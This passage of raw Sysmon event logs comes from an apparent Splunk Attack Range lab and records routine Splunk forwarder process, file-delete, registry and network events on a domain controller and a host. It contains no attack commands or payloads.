Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285544Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:20.138{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285543Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:20.138{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285542Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:20.138{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285541Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:20.138{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285540Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:20.138{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-0ED8-6216-B704-000000003802}1148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285539Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:20.138{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0ED8-6216-B704-000000003802}1148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285538Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:20.138{C8EA50B7-0ED8-6216-B704-000000003802}1148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000285569Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:21.716{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13A465903D84F85E2DEC718213CC9836,SHA256=4BA97202C66D3DDD87FB5234AAAA5755F7FB975FD50F5F182FF7BEB4785B7F1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214656Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:21.989{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D38F55C902346DF1A2298B57303A216,SHA256=FC44ADDE2CF7A19E3AF1F184BCA9A80D0552DCDBAD33906BFC74AD0C5538BF4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285568Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:21.669{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0C504098ACC63DCEEE22411F70CD997E,SHA256=3DD8E44D3054D8415C6B65A53EDADF6DE8C77FD4239B6092E3EDF6E9CEF85643,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285567Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:21.138{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0ED9-6216-B904-000000003802}3148C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285566Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:21.138{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285565Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:21.138{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285564Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:21.138{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285563Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:21.138{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285562Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:21.138{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-0ED9-6216-B904-000000003802}3148C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285561Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:21.138{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0ED9-6216-B904-000000003802}3148C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285560Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:21.138{C8EA50B7-0ED9-6216-B904-000000003802}3148C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000285570Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:22.731{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FB62FB377ED6F56BCB5A887BE7EC3AE,SHA256=4D7DBCB4C156DFF8E6D460FBB23E5BE76A1296FBFC69A6240B72407281F14B13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285571Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:23.747{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87EE72DFCB8551E908DE1A29DC78B26F,SHA256=AFDAA34DC95FCC5959AEC22BFEBE17F65AFAA406F88B0AD9DF80C0F748B2D216,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214657Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:23.114{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E76A2D498A77BBF70408499548DEB95,SHA256=F7E7BBCA183539D551C8524E913EB8EA3E0BF7B8DE5996401F962CB603EB1786,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285572Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:24.763{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F92560D0FADF192CE4AA3E06B862150,SHA256=3CCD9A2A641B8B3288F342F631095CBE84E975465ABB4B799DE5E3FBF01BCF92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214658Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:24.145{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CF014190F7D2156718A500509204600,SHA256=803781202752EF68D9C12DFC60B18B1899A7666ADA8341F2C0BCEFD29A079F82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285573Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:25.778{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09676755230A70910D08594F6ED87FE2,SHA256=AA8B53D4DB8C9A47A1CAD7C8BA0E812CD4B7351D7621A94063215D08FEE5AE4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214660Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:25.364{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97BCB8E459A6D057AECDA2E51261CCE9,SHA256=534C5C44C21CA23777935B9335D20E319ADF63505802D86B90E23E0530E713E1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214659Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:22.585{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51205-false10.0.1.12-8000- 23542300x8000000000000000285585Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:26.794{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66B407D5C0C66CB9B354011CE63DBA85,SHA256=E1927B5CB8DDC392C2A496D6C1B04DE9B2B91ECB07A06E17070B07B20D6CD1B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214661Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:26.457{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27676BC030AD900CF2ED37A6B009F39D,SHA256=395300C3A8668274B2BB01554127F7584436231F95F68AA52AD43499919F9EE9,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000285584Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:39:26.638{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000285583Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:39:26.638{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x007454a3) 13241300x8000000000000000285582Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:39:26.638{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d82899-0x3f3466f9) 13241300x8000000000000000285581Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:39:26.638{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d828a1-0xa0f8cef9) 13241300x8000000000000000285580Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:39:26.638{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d828aa-0x02bd36f9) 13241300x8000000000000000285579Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:39:26.638{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000285578Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:39:26.638{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x007454a3) 13241300x8000000000000000285577Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:39:26.638{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d82899-0x3f3466f9) 13241300x8000000000000000285576Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:39:26.638{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d828a1-0xa0f8cef9) 13241300x8000000000000000285575Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:39:26.638{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d828aa-0x02bd36f9) 354300x8000000000000000285574Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:23.600{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53267-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285586Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:27.809{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD79522DE52C82590498000B9BE0D1C0,SHA256=6CD850E394E09597F3CCEF6DCFDA2144539AD60E537C7E1A8F220AAE593C4ECA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214662Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:27.473{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 